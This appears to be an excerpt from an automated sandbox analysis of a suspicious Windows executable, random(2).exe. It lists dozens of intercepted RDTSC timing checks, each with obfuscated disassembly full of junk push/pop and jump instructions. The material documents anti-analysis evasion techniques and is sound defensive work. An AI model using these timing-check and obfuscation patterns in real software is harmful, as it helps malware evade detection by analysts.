              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C4563 second address: 6C4567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C8B93 second address: 6C8BA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29453582E1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C8EEE second address: 6C8EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6CA8D5 second address: 6CA8F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E6h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F29453582E2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6CA8F9 second address: 6CA8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6CA8FF second address: 6CA92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F29453582E4h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 jnc 00007F29453582D6h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F099A second address: 49F09B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 499078A second address: 4990790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4990790 second address: 49907F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F2944535544h 0x00000014 sub si, B9E8h 0x00000019 jmp 00007F294453553Bh 0x0000001e popfd 0x0000001f jmp 00007F2944535548h 0x00000024 popad 0x00000025 and esp, FFFFFFF8h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F294453553Ah 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49907F4 second address: 49907F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49907F8 second address: 49907FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49907FE second address: 4990804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4990804 second address: 499083B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 34h 0x0000000b pushad 0x0000000c mov edx, esi 0x0000000e jmp 00007F294453553Eh 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2944535547h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 499083B second address: 4990893 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c mov edx, 1875F780h 0x00000011 pushfd 0x00000012 jmp 00007F29453582E9h 0x00000017 jmp 00007F29453582DBh 0x0000001c popfd 0x0000001d popad 0x0000001e mov ax, BF3Fh 0x00000022 popad 0x00000023 xchg eax, ebx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 mov bx, cx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4990893 second address: 49908E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F2944535542h 0x0000000f sub eax, 03053B58h 0x00000015 jmp 00007F294453553Bh 0x0000001a popfd 0x0000001b popad 0x0000001c mov ebx, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F2944535545h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49908E1 second address: 4990912 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 74h 0x00000005 call 00007F29453582E8h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F29453582DDh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4990912 second address: 4990960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2944535547h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], esi 0x00000010 jmp 00007F2944535544h 0x00000015 xchg eax, edi 0x00000016 jmp 00007F2944535540h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4990960 second address: 4990964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4990964 second address: 499096A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 499096A second address: 4990970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4990970 second address: 4990974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4990974 second address: 4990978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4990978 second address: 4990997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 pushad 0x0000000a mov cl, dl 0x0000000c movzx esi, dx 0x0000000f popad 0x00000010 mov edi, dword ptr [ebp+0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F294453553Ah 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4990997 second address: 4990A0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 0EB7E744h 0x00000008 pushfd 0x00000009 jmp 00007F29453582DDh 0x0000000e and ecx, 358EC086h 0x00000014 jmp 00007F29453582E1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d sub esi, esi 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F29453582E8h 0x00000026 adc ax, CE58h 0x0000002b jmp 00007F29453582DBh 0x00000030 popfd 0x00000031 popad 0x00000032 mov dword ptr [esp+10h], esi 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F29453582E0h 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4990A0E second address: 4990A14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4990A14 second address: 4990A2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 movzx esi, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+14h], esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 mov edx, eax 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4990A2B second address: 4990A6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [edi] 0x0000000b jmp 00007F2944535546h 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 mov cx, 3C8Dh 0x00000016 mov ax, 1489h 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov di, si 0x00000022 mov ebx, ecx 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4990A6B second address: 4990B11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F29453582DFh 0x00000009 or si, 89EEh 0x0000000e jmp 00007F29453582E9h 0x00000013 popfd 0x00000014 movzx eax, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F29453582E9h 0x00000022 xor esi, 2AED80D6h 0x00000028 jmp 00007F29453582E1h 0x0000002d popfd 0x0000002e mov bx, si 0x00000031 popad 0x00000032 push FC53D4BFh 0x00000037 jmp 00007F29453582E3h 0x0000003c add dword ptr [esp], 79C1759Dh 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F29453582E5h 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4990B11 second address: 4990B1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, B322h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4990B8C second address: 4990B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4990B92 second address: 4990B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00269 second address: 4A0026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A0026D second address: 4A00271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00271 second address: 4A00277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00277 second address: 4A0027D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A0027D second address: 4A00281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00281 second address: 4A00292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov edi, 66EB41B2h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00292 second address: 4A002BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 mov eax, edi 0x00000009 jmp 00007F29453582E1h 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F29453582DDh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A002BD second address: 4A002FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F294453553Eh 0x00000010 push dword ptr [ebp+0Ch] 0x00000013 jmp 00007F2944535540h 0x00000018 push dword ptr [ebp+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A002FE second address: 4A00302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00302 second address: 4A00306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00306 second address: 4A0030C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A0030C second address: 4A00369 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 357C5091h 0x00000008 pushfd 0x00000009 jmp 00007F294453553Eh 0x0000000e or esi, 5C8911E8h 0x00000014 jmp 00007F294453553Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d call 00007F2944535539h 0x00000022 jmp 00007F2944535546h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F294453553Dh 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00369 second address: 4A0037E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A0037E second address: 4A003D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F2944535541h 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007F2944535541h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 call 00007F294453553Ah 0x00000025 pop eax 0x00000026 mov dx, 4426h 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A003D2 second address: 4A003E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582E3h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A003E9 second address: 4A003FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a mov ecx, edx 0x0000000c push eax 0x0000000d push edx 0x0000000e mov ebx, 1CC58DE0h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 4A00434 second address: 4A00438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49A0CA0 second address: 49A0CA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49A0CA4 second address: 49A0CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49A0CAA second address: 49A0CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F2944535543h 0x00000012 mov si, FBCFh 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49A0008 second address: 49A000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49A000E second address: 49A0048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535544h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2944535540h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F294453553Eh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49A0048 second address: 49A005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582DEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49A005A second address: 49A0072 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49A0072 second address: 49A008D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49A008D second address: 49A0093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49A0093 second address: 49A0097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49A0097 second address: 49A00C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push edi 0x0000000c jmp 00007F2944535548h 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49A00C0 second address: 49A00C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F080A second address: 49F0810 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0810 second address: 49F0838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F29453582E6h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0838 second address: 49F0855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0855 second address: 49F087B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F29453582DDh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F087B second address: 49F08D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushfd 0x00000006 jmp 00007F2944535543h 0x0000000b jmp 00007F2944535543h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 call 00007F294453553Bh 0x0000001d pop ecx 0x0000001e jmp 00007F2944535549h 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F08D5 second address: 49F08E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582DCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F05A3 second address: 49F0635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F294453553Eh 0x00000011 mov esi, eax 0x00000013 pushad 0x00000014 jmp 00007F294453553Eh 0x00000019 pushad 0x0000001a mov cx, CBD7h 0x0000001e pushfd 0x0000001f jmp 00007F294453553Ch 0x00000024 and esi, 72026648h 0x0000002a jmp 00007F294453553Bh 0x0000002f popfd 0x00000030 popad 0x00000031 popad 0x00000032 sub esi, edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F2944535540h 0x0000003d jmp 00007F2944535545h 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0635 second address: 49F0684 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov cl, byte ptr [edx] 0x0000000b jmp 00007F29453582E0h 0x00000010 mov byte ptr [esi+edx], cl 0x00000013 jmp 00007F29453582E0h 0x00000018 inc edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F29453582E7h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0684 second address: 49F069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2944535544h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F069C second address: 49F0700 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test cl, cl 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F29453582E4h 0x00000014 xor si, D558h 0x00000019 jmp 00007F29453582DBh 0x0000001e popfd 0x0000001f mov bx, si 0x00000022 popad 0x00000023 jne 00007F294535823Bh 0x00000029 pushad 0x0000002a push ebx 0x0000002b mov dx, cx 0x0000002e pop ecx 0x0000002f popad 0x00000030 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F29453582E0h 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0700 second address: 49F0775 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d mov cl, 79h 0x0000000f call 00007F2944535541h 0x00000014 mov ch, 07h 0x00000016 pop edi 0x00000017 popad 0x00000018 mov dword ptr fs:[00000000h], ecx 0x0000001f jmp 00007F2944535548h 0x00000024 pop ecx 0x00000025 jmp 00007F2944535540h 0x0000002a pop edi 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 call 00007F2944535543h 0x00000035 pop esi 0x00000036 popad 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F0775 second address: 49F07D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F29453582E4h 0x00000009 adc si, 1068h 0x0000000e jmp 00007F29453582DBh 0x00000013 popfd 0x00000014 mov ax, D65Fh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop esi 0x0000001c jmp 00007F29453582E2h 0x00000021 pop ebx 0x00000022 jmp 00007F29453582E0h 0x00000027 leave 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b movsx ebx, si 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F07D2 second address: 49F07D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F07D7 second address: 49F07DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F07DD second address: 49F07E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F07E1 second address: 49F07E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 49F07E5 second address: 49F080A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0008h 0x0000000b nop 0x0000000c mov eax, esi 0x0000000e pop esi 0x0000000f pop edi 0x00000010 pop ebx 0x00000011 pop ebp 0x00000012 retn 0004h 0x00000015 lea ecx, dword ptr [ebp-50h] 0x00000018 push 0041FD48h 0x0000001d call 00007F294452E842h 0x00000022 push ebp 0x00000023 push ebx 0x00000024 push edi 0x00000025 push esi 0x00000026 mov esi, ecx 0x00000028 mov ebx, dword ptr [esp+14h] 0x0000002c push ebx 0x0000002d call 00007F2948B168A5h 0x00000032 mov edi, edi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F2944535546h 0x0000003b rdtsc
